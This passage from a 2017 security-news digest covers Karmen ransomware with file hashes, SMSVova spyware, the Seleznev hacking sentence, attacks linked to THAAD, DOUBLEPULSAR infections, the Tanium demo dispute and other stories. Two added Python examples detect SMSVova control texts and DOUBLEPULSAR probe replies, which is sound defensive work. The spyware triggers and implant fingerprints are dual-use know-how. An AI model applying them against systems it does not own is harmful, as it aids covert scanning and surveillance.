The most interesting thing about Karmen is something else entirely: not the virus itself but the ecosystem around it. Managing a ransomware campaign is evidently completely simple. By far the hardest part is getting into one of the Russian underground forums at all and buying Karmen.
Managing a Karmen ransomware campaign. The dashboard shows the number of infected clients, how many have already paid and the total amount. (Source: Recorded Future)
If the attacker manages that and delivers the virus to the victim (again, say, via an e-mail attachment), all that is left is to open Karmen's web interface, which works as a sort of CRM. It was not developed by SAP or the like, but evidently by a few bored Russian students who want to earn money for vodka and bread.
The buyer can then watch in a browser as new “customers” keep arriving and whether they have paid the administrative fee in bitcoin, which can be adjusted dynamically. After a successful payment the decryption command is triggered automatically. That is, if the ransomware campaign has not ended in the meantime. Paying the attacker is therefore always a gamble: the virus may keep spreading on its own, but the connection to the remote server where someone controls all this may no longer exist. And above all, a completed payment only motivates further would-be ransomware attackers.
List of individual infected clients and their current status (Source: Recorded Future)
So what should you do to keep Karmen off your computer? Half the battle is behaving rationally online, and the other half is a properly secured computer. And as the Recorded Future specialists advise, if you come across the files below, delete them right away (and no, really do not forward them to your managers).
joise.exe (MD5 checksum: 9c8fc334a1dc660609f30c077431b547)
n_karmen.exe (MD5 checksum: 56b66af869248749b2f445be8f9f4a9d)
build.exe (MD5 checksum: 521983cb92cc0b424e58aff11ae9380b)
Fake app hiding the SMSVova spyware went undetected for years in the Google Play Store
23.4.2017 securityaffairs Android
Millions of users looking for software updates downloaded an app hiding a spyware called SMSVova from the official Google Play store.
Bad news for millions of Android users looking for software updates: they were tricked into downloading the SMSVova spyware from the official Google Play store.
Experts at Zscaler discovered that the bogus app posed as a legitimate application called “System Update” and claimed to give users access to the latest Android software release.
The fake application hiding the SMSVova spyware is estimated to have been uploaded to Google Play in 2014 and downloaded between 1,000,000 and 5,000,000 times.
Experts reported the discovery to Google that promptly removed it from the store.
The SMSVova spyware was developed to track the physical location of its users, and it was controlled by the attackers via SMS messages.
“In our ongoing effort to hunt malware, the Zscaler ThreatLabz team came across a highly suspicious app on the U.S. Google Play Store that has been downloaded between one and five million times since 2014.” reads the analysis published Zscaler. “Upon analysis, we found it to be an SMS-based Spyware, which can steal and relay a victim’s location to an attacker in real time.”
According to Zscaler, once the app was installed, users who tried to open it were shown the message:
‘Unfortunately, Update Service has stopped.’
The app then hides itself from the main screen and launches the phone's MyLocationService, which collects location data and stores it in the Shared Preferences directory of the device.
Despite the error message, the spyware sets up an Android service and a broadcast receiver:
MyLocationService: Fetches last known location
IncomingSMS (Receiver): Scans for incoming SMS message
SMSVova watches incoming SMS messages with specific characteristics: messages longer than 23 characters that contain the text string “vova-”, and the probe “get faq”.
“Once the spyware has been installed on the victim’s device, an attacker can send an SMS message ‘get faq’ and this spyware will respond with a set of commands,” according to Zscaler.
The SMSVova spyware implements other commands, including “changing current password” and “setting low battery notification.” According to Zscaler's Desai, the operators use these SMS commands to instruct SMSVova to retrieve location data and text it back. The “setting low battery notification” command instructs the phone to text its location when the battery runs low.
It is still a mystery why the threat actor behind the spyware was collecting location data.
It is interesting to note that neither the SMS-based behavior nor the exception raised at startup was detected by the antivirus engines on VirusTotal.
The authors of SMSVova designed the threat to evade detection by antivirus solutions and by Google Play's malware scanner. The app was last updated in December 2014; Google's controls were less stringent at the time, but the malicious code nonetheless eluded Google's detector for years.
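The trigger characteristics above (a message longer than 23 characters carrying “vova-”, or the bare “get faq” probe) are enough to triage an SMS log for operator traffic to an infected phone. The following is an added example, not Zscaler's code: it applies exactly that filter to a constructed log and extracts the command word that follows “vova-”. The log format, the phone numbers and the message bodies are invented for the demo, and the command names in them are hypothetical, modelled on the “changing current password” and “setting low battery notification” commands the page mentions rather than copied from the real spyware.

```python
# Added example (not Zscaler's code): SMS-log triage for SMSVova-style
# control messages. Sample log, numbers and command names are constructed.
import re
from dataclasses import dataclass
from typing import List, Optional

MIN_LEN = 23                              # per the report: messages longer than 23 chars
PROBE = "get faq"                         # per the report: makes the spyware reply with its command list
# "vova-" followed by a command word, up to a ':' separating an argument, or end of text.
TRIGGER = re.compile(r"vova-([a-z ]+?)(?::|$)", re.IGNORECASE)


@dataclass
class Sms:
    sender: str
    body: str


@dataclass
class Finding:
    sender: str
    reason: str
    command: str


def triage_sms(msg: Sms) -> Optional[Finding]:
    """Return a Finding if the message matches what SMSVova listens for, else None."""
    body = msg.body.strip()
    if body.lower() == PROBE:
        return Finding(msg.sender, "command-list probe", PROBE)
    match = TRIGGER.search(body)
    if match and len(body) > MIN_LEN:
        return Finding(msg.sender, "vova- control message", match.group(1).strip().lower())
    return None


def triage_log(messages: List[Sms]) -> List[Finding]:
    return [f for f in map(triage_sms, messages) if f is not None]


# Constructed log: one benign text, the probe, one hypothetical command with an
# argument, and one hypothetical command that is exactly 23 characters long and
# therefore falls below the spyware's length threshold.
SAMPLE_LOG = [
    Sms("+15550100", "Hey, are we still on for lunch tomorrow at noon?"),
    Sms("+15550199", "get faq"),
    Sms("+15550199", "vova-set user password:hunter2hunter2"),
    Sms("+15550199", "vova-set low battery:15"),
]


if __name__ == "__main__":
    for f in triage_log(SAMPLE_LOG):
        print(f"{f.sender}: {f.reason} -> {f.command!r}")
```

The fourth sample shows the edge the length rule creates: a message that matches the keyword but is not longer than 23 characters is ignored by the spyware, so a detector that mirrors its filter must ignore it too or it will report commands the implant never acted on. The same sender issuing a “get faq” probe shortly before a “vova-” message is the pattern worth alerting on.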
It is worth noting that, according to Google's recent Android Security 2016 Year In Review report, devices that installed applications only from Google Play had potentially harmful applications installed on fewer than 0.05 percent of them in 2016.
“There are many apps on the Google Play store that act as a spyware; for example, those that spy on the SMS messages of one’s spouse or fetch the location of children for concerned parents. But those apps explicitly state their purpose, which is not the case with the app we analyzed for this report,” concluded the analysis.
US Court sentenced Russian hacker Roman Seleznev to 27 years in jail for hacking
23.4.2017 securityaffairs Crime
Roman Seleznev, the son of prominent Russian Parliament member Valery Seleznev, was sentenced to 27 years in jail for hacking.
The Russian hacker Roman Seleznev, aka Track2, was sentenced to 27 years in prison after being convicted of causing $170 million in damage by hacking into point-of-sale systems.
This is the longest sentence ever imposed in the United States for a hacking-related case.
On the defense side, Seleznev's attorney Igor Litvak argued that a 27-year prison sentence is absolutely inappropriate for cyber theft.
Roman Seleznev is the son of one of Russia's most prominent lawmakers, Parliament member Valery Seleznev.
According to prosecutors, Seleznev targeted computers belonging to both small businesses and large financial institutions. Authorities arrested him in the Maldives in 2014 and seized his laptop, which contained more than 1.7 million credit card numbers.
The Russian Foreign Ministry judged the extradition to the US as a “kidnapping” and against all norms of international law.
The stolen credit card data was offered for sale on multiple “carding” websites.
After an August 2016 trial, Seleznev was convicted on 38 counts:
10 counts of Wire Fraud
9 counts of possession of 15 or more unauthorized access devices
9 counts of obtaining information from a Protected Computer
8 counts of Intentional Damage to a Protected Computer
2 counts of Aggravated Identity Theft
“A 32-year-old Vladivostok, Russia, man was sentenced today to 27 years in prison for his computer hacking crimes that caused more than $169 million in damage to small businesses and financial institutions, announced Acting Assistant Attorney General Kenneth A. Blanco of the Justice Department’s Criminal Division and U.S. Attorney Annette L. Hayes of the Western District of Washington. “
“Roman Valeryevich Seleznev, aka Track2, was convicted in August 2016, of 38 counts related to his scheme to hack into point-of-sale computers to steal credit card numbers and sell them on dark market websites. U.S. District Judge Richard A. Jones of the Western District of Washington imposed the sentence.” reads the press release published by the DoJ.
In federal court in Seattle, prosecutors asked for a 30-year prison term because Roman Seleznev “became one of the most revered point-of-sale [POS] hackers in the criminal underworld.”
Roman Seleznev was the mastermind behind a profitable hacking scheme that used automated techniques to break into POS systems and deliver malware that stole credit card data.
According to prosecutors, his hacking campaign hit more than 3,700 businesses.
“Many of the businesses targeted by Seleznev were small businesses, and included restaurants and pizza parlors in Western Washington, including Broadway Grill in Seattle, which was forced into bankruptcy following the cyber assault. Testimony at trial revealed that Seleznev’s scheme caused approximately 3,700 financial institutions more than $169 million in losses.” continues the press release.
Roman Seleznev asked US District Court Judge Richard Jones for clemency on account of his medical issues; he explained that he had been injured in a 2011 terrorist bombing in Morocco.
Jones rejected Seleznev's argument and told him that the Morocco bombing “was an invitation to right your wrongs and recognize you were given a second chance in life,” but instead he “amassed a fortune” at the expense of thousands of small businesses.
“Today is a bad day for hackers around the world,” said U.S. Attorney Annette L. Hayes. “As Mr. Seleznev has now learned, and others should take note – we are working closely with our law enforcement partners around the world to find, apprehend, and bring to justice those who use the internet to steal and destroy our peace of mind.”
“Whether the victims are multi-national banks or small pizza joints, we are all victims when our day-to-day transactions result in millions of dollars ending up in the wrong hands,” Hayes added.
Russian MP Valery Seleznev said the sentence was “passed by man-eaters” and that his son had been “abducted.”
“My son was tortured because being in jail in a foreign country after abduction is torture in itself. He is innocent,” he told the RIA Novosti news agency.
US Court Sentences Russian Lawmaker's Son to 27 Years in Jail for Hacking
22.4.2017 thehackernews Crime
The son of a prominent Russian lawmaker was sentenced on Friday by a US federal court to 27 years in prison after being convicted of stealing millions of US credit card numbers and causing some $170 million in damages to businesses and individuals.
This is so far the longest sentence ever imposed in the United States for a hacking-related case.
Roman Valeryevich Seleznev, 32, the son of a Russian Parliament member of the nationalist Liberal Democratic Party (LDPR), Valery Seleznev, was arrested in 2014 while attempting to board a flight in the Maldives and then extradited to the United States.
Upon arrest, federal authorities retrieved a computer that contained over 1.7 million stolen credit card numbers.
Seleznev, who also went by the moniker 'Track2' online, was convicted in August 2016 of 38 charges related to stolen credit card details, which include:
10 counts of Wire Fraud
9 counts of possession of 15 or more unauthorized access devices
9 counts of obtaining information from a Protected Computer
8 counts of Intentional Damage to a Protected Computer
2 counts of Aggravated Identity Theft
Longest Ever Hacking-Related Sentence in the United States
In federal court in Seattle, the government asked for a 30-year prison term for 38 counts, saying Seleznev not only helped grow the market for stolen credit card data but also "became one of the most revered point-of-sale [POS] hackers in the criminal underworld."
Seleznev – and potentially other cyber criminals who are unknown to the authorities – developed a hacking scheme that used automated techniques to hack into POS machines in retailers and install malware to steal copies of credit card numbers.
The lists of millions of stolen credit card numbers were then sold on various online "carding" websites and the dark web. Prosecutors said his hacking campaign hit more than 3,700 businesses.
Before his sentencing, Seleznev asked US District Court Judge Richard Jones for leniency, urging the judge to consider his medical issues, the result of being caught up in and injured by a 2011 terrorist bombing in Morocco, when deciding his prison term.
However, Jones told Seleznev that the Morocco bombing "was an invitation to right your wrongs and recognize you were given a second chance in life," but instead he "amassed a fortune" at the expense of thousands of small businesses.
"Today is a bad day for hackers around the world," said U.S. Attorney Annette L. Hayes. "As Mr. Seleznev has now learned, and others should take note – we are working closely with our law enforcement partners around the world to find, apprehend, and bring to justice those who use the internet to steal and destroy our peace of mind."
"Whether the victims are multi-national banks or small pizza joints, we are all victims when our day-to-day transactions result in millions of dollars ending up in the wrong hands," Hayes added.
Russian MP: Sentence "Passed by Man-Eaters;" My Son is innocent!
Twenty-seven years in prison is an absolutely inappropriate sentence for cyber theft, Seleznev's defense attorney Igor Litvak said on Friday.
Seleznev's arrest in the Maldives and then extradition to the United States sparked an international dispute between American and Russian authorities. The Russian Foreign Ministry even characterized the extradition as a "kidnapping" and against all norms of international law.
Russian MP Valery Seleznev, the father of Seleznev, said the sentence was "passed by man-eaters" and that his son was "abducted."
The Russian MP added that his "son was tortured because being in jail in a foreign country after abduction is torture in itself. He is innocent."
Mr. Seleznev also said that he viewed the 27-year prison sentence as a life sentence, because his son would never survive that many years in prison.
Chinese APTs targeted the South Korean THAAD anti-missile systems
22.4.2017 securityaffairs APT
According to researchers at FireEye, Chinese hackers targeted the South Korean Terminal High Altitude Area Defense (THAAD) missile system.
According to a new investigation by security firm FireEye, Chinese hackers are attempting to break into systems used by the South Korean military in connection with the deployment of an anti-ballistic-missile system.
The news was confirmed by John Hultquist, FireEye's director of cyber-espionage analysis, in an interview with the Wall Street Journal.
FireEye has observed cyber attacks aimed at the Terminal High Altitude Area Defense (THAAD) missile system. THAAD, built by Lockheed Martin, is designed to intercept incoming ballistic missiles and is being deployed in South Korea to protect the country.
South Korea is deploying Lockheed Martin’s THAAD missile defense system (Image source Ars Technica)
China has opposed the deployment of THAAD ever since South Korea announced it as a key component of its defense infrastructure.
“China opposes Thaad, saying its radar system can reach deep into its own territory and compromise its security. South Korea and the U.S. say Thaad is purely defensive. The first components of the system arrived in South Korea last month and have been a key issue in the current presidential campaign there.” reported the WSJ.
According to FireEye, at least two different Chinese hacking crews were involved in cyber attacks against the South Korean military systems that in some way were linked to the design and deployment of the THAAD.
The two teams involved in the attack are the Tonto team and the notorious APT10.
“One of the two hacker groups, which FireEye dubbed Tonto Team, is tied to China’s military and based out of the northeastern Chinese city of Shenyang, where North Korean hackers are also known to be active, said Mr. Hultquist, a former senior U.S. intelligence analyst.” continues the WSJ. “FireEye believes the other, known as APT10, may be linked to other Chinese military or intelligence units.”
Hackers launched spear phishing attacks using messages with weaponized attachments. According to FireEye, at least one person fell victim to the attacks; nevertheless, FireEye was able to profile the threat actors and track the APTs’ movements.
“Mr. Hultquist added that an error in one of the group’s operational security provided FireEye’s analysts with new information about the group’s origins.”
China’s Ministry of Defense recently declared that People’s Liberation Army “has never supported any hacking activity.”
Hackers compromised thousands of Windows boxes using leaked NSA hack tools DOUBLEPULSAR and ETERNALBLUE
22.4.2017 securityaffairs BigBrothers
Security researchers warn that hackers have compromised thousands of Windows boxes using the leaked NSA hacking tools DOUBLEPULSAR and ETERNALBLUE.
Security expert Dan Tentler, the founder of security shop Phobos Group, has observed a significant increase in the number of Windows boxes exposed on the Internet that have been hacked with the DOUBLEPULSAR backdoor. The compromised Windows boxes have been used for several criminal purposes, such as delivering malware or sending spam campaigns.
The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system. It is installed by leveraging ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that can trigger remote code execution in older versions of Windows (Windows XP to Server 2008 R2).
Every Windows machine running an old vulnerable version that exposes an SMB service is at risk of being hacked.
The DOUBLEPULSAR and ETERNALBLUE are now available for anyone after the archive of NSA tools was leaked online.
Recently Microsoft patched the SMB Server vulnerability (MS17-010) exploited by ETERNALBLUE, the security updates were released for Windows Vista SP2, Windows 7, Windows 8.1, Windows RT 8.1, Windows 10, Windows Server 2008 SP2, Windows Server 2008 R2 SP1, Windows Server 2012 and Windows Server 2012 R2, Windows Server 2016, and Server Core.
According to Tentler, who scanned the Internet for vulnerable Windows boxes, 15,196 systems have been already compromised, most of them in the US.
The expert also observed that the number of infections continues to increase.
Windows boxes compromised with the DOUBLEPULSAR implant can be easily identified by observing the response to a special ping sent to port 445.
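As an added illustration of that check (not code from the article or from Tentler's scanner): the publicly documented DOUBLEPULSAR ping is an SMBv1 Trans2 SESSION_SETUP request sent with Multiplex ID 0x41; a clean host echoes 0x41 in its reply, while the implant answers with 0x51. The 0x41/0x51 values are an assumption not stated on the page, and the host names and captured replies below are constructed.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
MID_PROBE = 0x41    # Multiplex ID carried by the Trans2 probe; a clean host echoes it back
MID_IMPLANT = 0x51  # the DOUBLEPULSAR implant answers the same probe with this value (assumption)


def parse_smb1_header(payload: bytes) -> dict:
    """Parse a NetBIOS session message (4 bytes) carrying an SMBv1 header (32 bytes).

    Raises ValueError for anything malformed, so callers can separate
    'clean' from 'could not tell'."""
    if len(payload) < 36:
        raise ValueError("truncated: need 4-byte NetBIOS header + 32-byte SMB header")
    nb_type = payload[0]
    nb_len = int.from_bytes(payload[1:4], "big")
    if nb_type != 0x00:
        raise ValueError(f"unexpected NetBIOS message type 0x{nb_type:02x}")
    if nb_len != len(payload) - 4:
        raise ValueError("NetBIOS length field does not match payload length")
    smb = payload[4:36]
    if smb[:4] != SMB_MAGIC:
        raise ValueError("missing SMBv1 magic")
    # Command(1) Status(4) Flags(1) Flags2(2) PIDHigh(2) Signature(8) Reserved(2)
    # TID(2) PIDLow(2) UID(2) MID(2), all little-endian
    command, status, flags, flags2, pid_high, tid, pid_low, uid, mid = struct.unpack(
        "<BIBHH8x2xHHHH", smb[4:32])
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "tid": tid, "pid": (pid_high << 16) | pid_low, "uid": uid, "mid": mid}


def classify_probe_response(payload: bytes) -> str:
    """'implant' if the Trans2 reply carries MID 0x51, 'clean' if it echoes 0x41,
    otherwise 'inconclusive' (malformed reply or not a Trans2 response)."""
    try:
        hdr = parse_smb1_header(payload)
    except ValueError:
        return "inconclusive"
    if hdr["command"] != SMB_COM_TRANSACTION2:
        return "inconclusive"
    if hdr["mid"] == MID_IMPLANT:
        return "implant"
    if hdr["mid"] == MID_PROBE:
        return "clean"
    return "inconclusive"


def build_sample_response(mid: int, command: int = SMB_COM_TRANSACTION2,
                          status: int = 0xC0000002) -> bytes:
    """Construct a minimal SMBv1 reply (reply flag set, empty body) for testing.
    The status, TID, PID and UID values are sample values, not captured ones."""
    smb = SMB_MAGIC + struct.pack("<BIBHH8x2xHHHH", command, status, 0x80, 0xC801, 0,
                                  0x0800, 0xFEFF, 0x0800, mid)
    body = b"\x00" + b"\x00\x00"  # WordCount = 0, ByteCount = 0
    msg = smb + body
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


def triage(captures: dict) -> dict:
    """Classify a {host: raw_reply} map, e.g. replies captured on one's own network."""
    return {host: classify_probe_response(reply) for host, reply in captures.items()}


if __name__ == "__main__":
    # Constructed captures: one host answering like the implant, one answering normally
    sample = {"10.0.0.5": build_sample_response(MID_IMPLANT),
              "10.0.0.6": build_sample_response(MID_PROBE)}
    for host, verdict in triage(sample).items():
        print(host, verdict)
```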
“I’m hopeful this is the wakeup moment for people over patching Windows machines.” said Tentler.
According to Tentler on Easter weekend, script kiddies worldwide launched a massive attack leveraging the DOUBLEPULSAR exploit.
The experts have no doubt that the number of DOUBLEPULSAR attacks will continue to increase in the coming weeks.
Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs
22.4.2017 thehackernews BigBrothers
Script kiddies and online criminals around the world have reportedly started exploiting NSA hacking tools leaked last weekend to compromise hundreds of thousands of vulnerable Windows computers exposed on the Internet.
Last week, the mysterious hacking group known as Shadow Brokers leaked a set of Windows hacking tools targeting Windows XP, Windows Server 2003, Windows 7 and 8, and Windows 2012, which allegedly belonged to the NSA's Equation Group.
What's Worse? Microsoft quickly downplayed the security risks by releasing patches for all exploited vulnerabilities, but there are still risks in the wild with unsupported systems as well as with those who haven't yet installed the patches.
Multiple security researchers have performed mass Internet scans over the past few days and found tens of thousands of Windows computers worldwide infected with DoublePulsar, a suspected NSA spying implant, as a result of a free tool released on GitHub for anyone to use.
Security researchers from Switzerland-based security firm Binary Edge performed an Internet scan and detected more than 107,000 Windows computers infected with DoublePulsar.
A separate scan done by Errata Security CEO Rob Graham detected roughly 41,000 infected machines, while another by researchers from Below0day detected more than 30,000 infected machines, a majority of which were located in the United States.
The impact? DoublePulsar is a backdoor used to inject and run malicious code on already infected systems, and is installed using the EternalBlue exploit that targets SMB file-sharing services on Microsoft's Windows XP to Server 2008 R2.
Therefore, to compromise a machine, it must be running a vulnerable version of Windows with an SMB service exposed to the attacker.
Both DoublePulsar and EternalBlue are suspected as Equation Group tools and are now available for any script kiddie to download and use against vulnerable computers.
Once installed, DoublePulsar uses hijacked computers to sling malware, spam online users, and launch further cyber attacks on other victims. To remain stealthy, the backdoor doesn't write any files to the PCs it infects, which also prevents it from persisting after an infected PC is rebooted.
While Microsoft has already patched the majority of the exploited flaws in affected Windows operating systems, those who have not patched are vulnerable to exploits such as EternalBlue, EternalChampion, EternalSynergy, EternalRomance, EmeraldThread, and EducatedScholar.
Moreover, systems that are still using end-of-life platforms like Windows XP, Windows Server 2003, and IIS 6.0, which no longer receive security updates, are also vulnerable to the in-the-wild exploits.
Since it takes hackers roughly a few hours to download the Shadow Brokers dump, scan the Internet with the tool released on Monday, and deliver exploits, researchers are expecting more vulnerable and unpatched computers to fall victim to DoublePulsar.
After this news had broken, Microsoft officials released a statement saying: "We doubt the accuracy of the reports and are investigating."
Meanwhile, Windows users who haven't applied MS17-010 by now are strongly advised to download and deploy the patches as soon as possible.
US court sends Russian hacker to prison for 27 years
22.4.2017 Novinky/Bezpečnost Crime
On Friday, a court in Seattle sentenced Russian hacker Roman Seleznev to 27 years in prison for online credit card theft and other online fraud that caused damages of 169 million dollars (4.2 billion Czech crowns). According to American lawyers, it is the harshest sentence handed down in the US for similar crimes so far.
On Saturday, Russia called the hacker's trial illegal, because according to Moscow Seleznev was abducted to the US by American secret services.
The whole case is extremely sensitive for Russia, because Roman Seleznev is the son of Valery Seleznev, a member of the Russian State Duma for the Russian nationalists. Thirty-two-year-old Roman had been engaged in online fraud since 2009; according to American prosecutors, he obtained sensitive data on 1.7 million credit cards.
He stole the data from the computer systems of pizzerias and restaurants, mostly in the state of Washington in the northwestern US, and then sold it.
Seleznev pleaded guilty and asked the court for leniency in view of his disability. In 2011 he was injured in a terrorist attack in Marrakesh, Morocco, that killed 17 people, mostly foreign tourists.
American justice had charged Seleznev as early as 2011, but could not detain him in Russia. When Seleznev went on vacation to the Maldives in 2014, Washington asked the local authorities for cooperation. The hacker was eventually extradited to the US.
His extradition bothers Russia because Seleznev is a Russian citizen and, according to Moscow, was "effectively abducted" from the Maldives. The Russian embassy in Washington issued a statement according to which "Russia insists that the detention of Seleznev in the Maldives in 2014 was illegal." Russia reportedly expects the convicted man's defense lawyer to appeal.
Seleznev himself issued a statement in which he calls the harsh verdict "a signal from the United States government to Russian President Vladimir Putin." According to the Russian hacker, this "is not the right way to show Russia or any other country how justice works in a democracy."
Tanium Blasted for Using California Hospital Network for Sales Demos
22.4.2017 securityweek Security
Tanium Accused of Exposing California Hospital’s Network in Sales Demos Without Client Permission
Earlier this week, Orion Hindawi, CEO of systems and security management company Tanium, published an open letter covering two issues of current 'bad press'. The first is that Tanium has a toxic staff relations culture. Hindawi denies this: "Mission-oriented, hard-charging, disciplined, even intense, but not toxic."
The second issue is less easy to dismiss. It stems from an initial report in The Wall Street Journal, subsequently picked up by numerous other media outlets.
"For years, cybersecurity startup Tanium Inc. pitched its software by showing it working in the network of a hospital it said was a client..." wrote the WSJ. The problem here is that the demo was live and uncensored, giving out details of the client's name (the El Camino Hospital in Mountain View, California) and IT infrastructure, apparently without authorization to do so.
'Start-up' is a misleading description: Tanium is neither new (it was founded ten years ago), nor small (it was last valued at $3.5 billion). It has, however, been growing rapidly; and that might be part of the problem. In May 2014 it raised $90 million in funding from Silicon Valley VC firm Andreessen Horowitz; and added a further $52 million in March 2015.
"When you start to develop a new product," Stuart Okin, SVP of Product at 1E told SecurityWeek, "the very first thing you do is solve the problem of how you are going to demonstrate it." 1E spent three months solving this problem at the start of developing Tachyon, a competing product that bears some similarities to Tanium.
Both products must scale to huge numbers, and need to be able to demonstrate this ability. Okin's solution was to develop an in-house emulator using virtual machines. Tanium doesn't seem to have had such a plan. Exactly what happened isn't clear, beyond that Tanium seems to have had a direct link into the hospital's system and was able to demonstrate the product in action, live.
In doing so, viewers would have been able to discover information about the network's infrastructure and its strengths and weaknesses -- knowledge that would have been invaluable to a potential attacker. In his letter, Hindawi acknowledges mistakes. Without mentioning El Camino, he writes, "We should have done better anonymizing that customer’s data."
But he also makes the point, "Other than the few customers who have signed those documents [allowing Tanium demonstrations] and provided us remote access to their Tanium platforms, we do not -- and in fact cannot -- demonstrate customer environments with Tanium." This implies that someone at El Camino provided the physical connection that allowed the Tanium demonstrations.
But the hospital denies this. In a separate statement, a spokesperson said, "El Camino Hospital was recently made aware that Tanium, a former third-party vendor that provided a desktop management program, had been using hospital desktop and server management information as part of a sales demonstration. El Camino Hospital was not aware of this usage and never authorized Tanium to use hospital material in any sales material or presentation."
Clearly, these two statements do not align. "This is a very embarrassing incident for the cybersecurity industry, as it undermines trust towards the large and reputable players," High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek. "However, anyone can make a mistake, and prior to any conclusions or accusations, a thorough investigation should be duly performed. Many successful companies become victims of their own success -- it’s very challenging to maintain skyrocketing growth and assure that every employee respects all the internal procedures and policies in their integrity. In the cybersecurity industry, this problem is especially important, as startups grow very quickly and handle extremely sensitive data. I hope that all companies, not just Tanium, will learn a lesson and revise their internal policies and their practical enforcement."
Mistakes were certainly made, but the bottom line is that it should never have happened. "Using live customer environments for demos is a rookie move, and certainly not representative of standard practice among security software vendors," commented Okin. "There are established protocols for this -- such as demo rigs in the cloud. The 'wild west' startup approach doesn't fly in the security space, especially as these products and solutions are there to protect information, and you often find yourself engaged in heavily regulated environments."
He added that security companies should never be able to VPN into clients' infrastructures, unless it is an essential part of the service offered. This incident, he said, breaks the essential trust that is necessary between security vendor and client.
WikiLeaks Details Samsung Smart TV Hacking Tool
22.4.2017 securityweek BigBrothers
WikiLeaks has released a document detailing yet another hacking tool allegedly used by the U.S. Central Intelligence Agency (CIA). This time, the organization has published information on a tool designed to record audio via the built-in microphone of some Samsung smart TVs.
The tool, dubbed “Weeping Angel,” is apparently based on “Extending,” an implant allegedly developed by British security service MI5 – the agencies are said to have worked together on this project.
Some information on Weeping Angel was made public by WikiLeaks as part of the first Vault 7 dump, and the organization has now decided to also release a user guide.
The newly released guide, dated February 2014, describes an implant for Samsung F series smart TVs. The implant can record audio from a device via the built-in microphone and either store or exfiltrate the recordings.
The Weeping Angel implant can be installed by connecting a USB device to the targeted TV, and data can be exfiltrated either via a USB stick or a compromised Wi-Fi hotspot. However, previously leaked documents showed that its developers had been planning to add more data theft capabilities, including for browser data and Wi-Fi credentials, and even exploiting available remote access features.
SecurityWeek has reached out to Samsung for comment and will update this article if the company responds.
Last week, WikiLeaks released six documents describing a project named HIVE, which the CIA allegedly used to exfiltrate information from compromised machines and send commands to the malware found on these devices.
The whistleblower organization has also detailed hacking tools targeting security products, a framework used to make attribution and analysis of malware more difficult, and a platform designed for creating custom malware installers.
While WikiLeaks has offered to share the exploits it possesses with affected tech companies, most firms don’t seem willing to comply with WikiLeaks’ conditions for obtaining the files. Furthermore, an analysis of the available information showed that many of the vulnerabilities have already been patched.
U.S. authorities have neither confirmed nor denied the authenticity of the Vault 7 files, but reports say both the CIA and the FBI are hunting for an insider who may have provided the information to WikiLeaks.
Researchers at Symantec and Kaspersky have found links between the leaked Vault 7 files and the tools used by a cyber espionage group tracked by the security firms as Longhorn and The Lamberts, respectively.
Kaspersky improves its corporate anti-malware
22.4.2017 SecurityWorld Security
Kaspersky Lab has launched an updated version of its Endpoint Security for Business product. It brings redesigned controls, increased flexibility and data protection, and centralized management of a larger number of platforms, applications and devices.
Companies using Endpoint Security for Business, Security for Exchange Servers or Security for SharePoint can now monitor individual devices through the Security Center platform. It is a unified administration console that, in addition to integrated multi-layered endpoint protection, offers the company's employees the ability to communicate and collaborate with each other.
In addition, the new Endpoint Security features and improvements are also available via remote installation for devices running the Mac operating system, with simpler installation, protection and management of mobile devices, and new Wi-Fi connection management options (a list of trusted Wi-Fi networks is available).
The improved Endpoint Security for Business can also be used as a sensor for the Anti-Targeted Attack platform: once installed, it collects and sends data to the platform, providing better information about corporate systems.
Another feature, Changes audit, gives IT security professionals an overview of changes made to corporate procedures and tasks. By comparing them, it immediately identifies any discrepancies, which significantly improves control over changes to security settings.
The new release also offers full-disk encryption via Microsoft BitLocker or Kaspersky Disk Encryption. Security Center can remotely control BitLocker, monitor the status of encrypted devices and back up the encryption keys needed to recover forgotten credentials.
Given the differing requirements of individual companies, Kaspersky Endpoint Security for Business comes in Select, Advanced and Total bundles with different sets of features.
MasterCard launches Credit Card with Built-In Fingerprint Scanner
21.4.2017 thehackernews Safety
MasterCard has unveiled its brand new payment card that has a built-in biometric fingerprint scanner, allowing customers to authorize payments with their fingerprint, without requiring a PIN code or a signature.
The company is already testing the new biometric payment cards, combined with the on-board chips, in South Africa and says it hopes to roll out the new cards to the rest of the world by the end of 2017.
Don't Worry, It Still Supports PIN-based Transactions as Fallback
Wait — If you think that this feature would not allow you to share your card with your child and spouse, don’t worry — Mastercard has a solution for this issue as well.
The company has confirmed that even if the card is configured to expect a fingerprint to authenticate a purchase, it still has a PIN as a fallback, in case the EMV reader fails to read the fingerprint for some reason or you have handed the card to your child for shopping.
Stores & Retailers Don't Need New Hardware
According to Mastercard, the new biometric payment card will not require store owners and businesses to buy any new hardware, like fingerprint scanners, because the sensor in the card reads your fingerprint.
Since both the data and the scanner exist on the same card, the new payment cards work with existing EMV card terminal infrastructure — the standard chip/swipe readers you can find at many stores these days, though old magnetic stripe-only terminals won't be compatible.
But, Banks Need to Adopt New Technology
Before these new cards can be adopted worldwide, your bank or financial institution will have to get on board with the new tech.
If you want the new biometric card, you are currently required to go to your bank branch in order to have your fingers scanned and registered for the new tech. Your fingerprints will then be converted into an encrypted digital template that is stored on the card's EMV chip.
You can save up to two fingerprints, but both would have to be yours — you cannot authorise someone else, even from your family, to use your card with their fingers.
Once your templates are saved, your card is ready to be used at compatible terminals across the world.
Merchants don't have to purchase new equipment to accept your fingerprint-enabled payment card but will have to update their machinery in an effort to use the new tech.
Now, while shopping at any store, just place your biometric payment card into a retailer's EMV terminal and then put your finger on the embedded sensor to pay. Your fingerprints will be verified against a template stored on your card to approve your transaction.
Can Fingerprints be Forged? And Other Concerns...
This new card is an attempt to make face-to-face payments more convenient and more secure, but this type of biometric verification is useless when it comes to online shopping, and so it does not provide any protection against credit card fraud there.
"Whether unlocking a smartphone or shopping online, the fingerprint is helping to deliver additional convenience and security," MasterCard security chief Ajay Bhalla said. "[A fingerprint is] not something that can be taken or replicated and will help our cardholders get on with their lives knowing their payments are protected."
But that isn't true.
Fingerprints can be faked, unfortunately, and we have seen previous research in which high-resolution images were used to make fake fingerprints for malicious purposes. So, criminals could put a fake fingerprint on top of their finger to shop with stolen cards.
